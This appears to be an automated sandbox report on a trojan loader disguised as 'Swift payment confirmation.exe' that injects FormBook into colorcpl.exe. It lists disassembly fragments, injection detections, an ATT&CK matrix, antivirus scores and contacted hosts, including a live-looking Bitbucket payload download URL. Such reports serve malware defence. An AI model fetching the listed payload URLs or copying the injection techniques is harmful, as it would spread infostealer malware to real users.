            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0C00 mov eax, dword ptr fs:[00000030h]2_2_267A0C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CCC00 mov eax, dword ptr fs:[00000030h]2_2_267CCC00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2CF0 mov eax, dword ptr fs:[00000030h]2_2_267C2CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2CF0 mov eax, dword ptr fs:[00000030h]2_2_267C2CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2CF0 mov eax, dword ptr fs:[00000030h]2_2_267C2CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2CF0 mov eax, dword ptr fs:[00000030h]2_2_267C2CF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814C0F mov eax, dword ptr fs:[00000030h]2_2_26814C0F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2682CC20 mov eax, dword ptr fs:[00000030h]2_2_2682CC20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2682CC20 mov eax, dword ptr fs:[00000030h]2_2_2682CC20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788CD0 mov eax, dword ptr fs:[00000030h]2_2_26788CD0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678CCC8 mov eax, dword ptr fs:[00000030h]2_2_2678CCC8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834C34 mov eax, dword ptr fs:[00000030h]2_2_26834C34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834C34 mov eax, dword ptr fs:[00000030h]2_2_26834C34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834C34 mov eax, dword ptr fs:[00000030h]2_2_26834C34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834C34 mov eax, dword ptr fs:[00000030h]2_2_26834C34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834C34 mov eax, dword ptr fs:[00000030h]2_2_26834C34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834C34 mov eax, dword ptr fs:[00000030h]2_2_26834C34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834C34 mov ecx, dword ptr fs:[00000030h]2_2_26834C34
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B8CB1 mov eax, dword ptr fs:[00000030h]2_2_267B8CB1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B8CB1 mov eax, dword ptr fs:[00000030h]2_2_267B8CB1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788C8D mov eax, dword ptr fs:[00000030h]2_2_26788C8D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790D59 mov eax, dword ptr fs:[00000030h]2_2_26790D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790D59 mov eax, dword ptr fs:[00000030h]2_2_26790D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790D59 mov eax, dword ptr fs:[00000030h]2_2_26790D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798D59 mov eax, dword ptr fs:[00000030h]2_2_26798D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798D59 mov eax, dword ptr fs:[00000030h]2_2_26798D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798D59 mov eax, dword ptr fs:[00000030h]2_2_26798D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798D59 mov eax, dword ptr fs:[00000030h]2_2_26798D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798D59 mov eax, dword ptr fs:[00000030h]2_2_26798D59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26858DAE mov eax, dword ptr fs:[00000030h]2_2_26858DAE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26858DAE mov eax, dword ptr fs:[00000030h]2_2_26858DAE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864DAD mov eax, dword ptr fs:[00000030h]2_2_26864DAD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814DD7 mov eax, dword ptr fs:[00000030h]2_2_26814DD7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814DD7 mov eax, dword ptr fs:[00000030h]2_2_26814DD7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C4D1D mov eax, dword ptr fs:[00000030h]2_2_267C4D1D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26786D10 mov eax, dword ptr fs:[00000030h]2_2_26786D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26786D10 mov eax, dword ptr fs:[00000030h]2_2_26786D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26786D10 mov eax, dword ptr fs:[00000030h]2_2_26786D10
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26830DF0 mov eax, dword ptr fs:[00000030h]2_2_26830DF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26830DF0 mov eax, dword ptr fs:[00000030h]2_2_26830DF0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AAD00 mov eax, dword ptr fs:[00000030h]2_2_267AAD00

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6440000 protect: page execute and read and writeJump to behavior
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6441560Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6440000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6440000Jump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_032B5ACC
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: GetLocaleInfoA,0_2_032BA7C4
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_032B5BD8
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: GetLocaleInfoA,0_2_032BA810
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B920C GetLocalTime,0_2_032B920C
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BB78C GetVersionExA,0_2_032BB78C

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		1
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		1
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Valid Accounts            		LSASS Memory121
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)41
            Process Injection            		1
            Access Token Manipulation            		Security Account Manager2
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		2
            Virtualization/Sandbox Evasion            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script41
            Process Injection            		LSA Secrets1
            System Network Connections Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information            		DCSync24
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Swift payment confirmation.exe66%ReversingLabsWin32.Trojan.ModiLoader
            Swift payment confirmation.exe61%VirustotalBrowse
            Swift payment confirmation.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
            bitbucket.org0%VirustotalBrowse
            bbuseruploads.s3.amazonaws.com2%VirustotalBrowse

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            s3-w.us-east-1.amazonaws.com
            		52.217.102.228
            		truefalseunknown
            bitbucket.org
            		185.166.143.50
            		truetrueunknown
            bbuseruploads.s3.amazonaws.com
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzhtrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://bitbucket.org/Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.0000000000863000.00000004.00000020.00020000.00000000.sdmptrue
                		unknown
                https://bbuseruploads.s3.amazonaws.com/2Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008CB000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://remote-app-switcher.prod-east.frontend.public.atl-paas.netSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzhps.DLLSwift payment confirmation.exe, 00000000.00000002.2171637621.000000000081E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://bitbucket.org:443/akeem4u/canter/downloads/233_HherfkswbzhSwift payment confirmation.exe, 00000000.00000003.2136347138.00000000008EA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://web-security-reports.services.atlassian.com/csp-report/bb-websiteSwift payment confirmation.exe, 00000000.00000003.2127729872.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2090782300.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://bitbucket.org/akeem4u/canter/downloads/233_HherfkswbzhHGSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://cdn.cookielaw.org/Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-Swift payment confirmation.exe, 00000000.00000002.2171637621.0000000000892000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2090782300.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://aui-cdn.atlassian.com/Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://bitbucket.org/ASwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://remote-app-switcher.stg-east.frontend.public.atl-paas.netSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://bitbucket.org/HSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-Swift payment confirmation.exe, 00000000.00000003.2127729872.00000000008F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://bbuseruploads.s3.amazonaws.com/cSwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://bbuseruploads.s3.amazonaws.com:443/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-5Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.pmail.comSwift payment confirmation.exe, Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003239000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000003003000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2217929734.000000007FE2F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netSwift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://dz8aopenkvv6s.cloudfront.netSwift payment confirmation.exe, 00000000.00000003.2127766348.00000000008F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://bbuseruploads.s3.amazonaws.com/ISwift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          3.5.29.82
                                                          		unknownUnited States
                                                          		14618AMAZON-AESUSfalse
                                                          52.217.102.228
                                                          		s3-w.us-east-1.amazonaws.comUnited States
                                                          		16509AMAZON-02USfalse
                                                          185.166.143.50
                                                          		bitbucket.orgGermany
                                                          		16509AMAZON-02UStrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1545881
                                                          Start date and time:2024-10-31 09:06:05 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 17s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:5
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Swift payment confirmation.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@3/0@3/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 47
                                                          • Number of non-executed functions: 255
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          04:06:56API Interceptor1x Sleep call for process: Swift payment confirmation.exe modified
                                                          04:07:18API Interceptor3x Sleep call for process: colorcpl.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          185.166.143.50Proforma Fatura ektedir.exeGet hashmaliciousDBatLoaderBrowse
                                                            https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                              PI and payment confirmed Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                  https://bitbucket.org/aaa14/aaaa/downloads/script3.txtGet hashmaliciousUnknownBrowse
                                                                    ip4.cmdGet hashmaliciousUnknownBrowse
                                                                      sostener.vbsGet hashmaliciousNjratBrowse
                                                                        sostener.vbsGet hashmaliciousXWormBrowse
                                                                          nTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                                            http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              s3-w.us-east-1.amazonaws.comOrder pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 3.5.20.124
                                                                              Proforma Fatura ektedir.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 3.5.16.19
                                                                              Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                              • 52.217.116.65
                                                                              Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                              • 16.182.68.249
                                                                              Fatura, siparis onayi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 3.5.27.71
                                                                              https://hhicorporation.start.page/Get hashmaliciousUnknownBrowse
                                                                              • 54.231.133.17
                                                                              https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/Get hashmaliciousUnknownBrowse
                                                                              • 52.217.74.116
                                                                              order confirmation.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 3.5.29.53
                                                                              http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                              • 52.216.94.195
                                                                              https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%2A%3DUTF-8%27%27FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0Get hashmaliciousPhisherBrowse
                                                                              • 3.5.10.199
                                                                              bitbucket.orgOrder pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 185.166.143.48
                                                                              Proforma Fatura ektedir.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 185.166.143.49
                                                                              Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                              • 185.166.143.49
                                                                              Proforma Fatura ektedir.exeGet hashmaliciousDBatLoaderBrowse
                                                                              • 185.166.143.50
                                                                              Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                              • 185.166.143.48
                                                                              Fatura, siparis onayi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 185.166.143.48
                                                                              order confirmation.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 185.166.143.49
                                                                              http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                              • 185.166.143.48
                                                                              z10982283782.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 185.166.143.48
                                                                              z11Nuevalistadepedidos.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                              • 185.166.143.49

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              AMAZON-AESUS(No subject) (100).emlGet hashmaliciousTycoon2FABrowse
                                                                              • 52.20.47.208
                                                                              https://irs-ci.secureemailportal.com/s/e?m=ABDvX2xiE1DvdsTP333wt4Qp&c=ABDsD05ZNJ23bCjfjm6gXjJS&em=publicrecords%40marionfl.orgGet hashmaliciousUnknownBrowse
                                                                              • 34.236.71.145
                                                                              https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utmGet hashmaliciousHTMLPhisherBrowse
                                                                              • 54.205.46.242
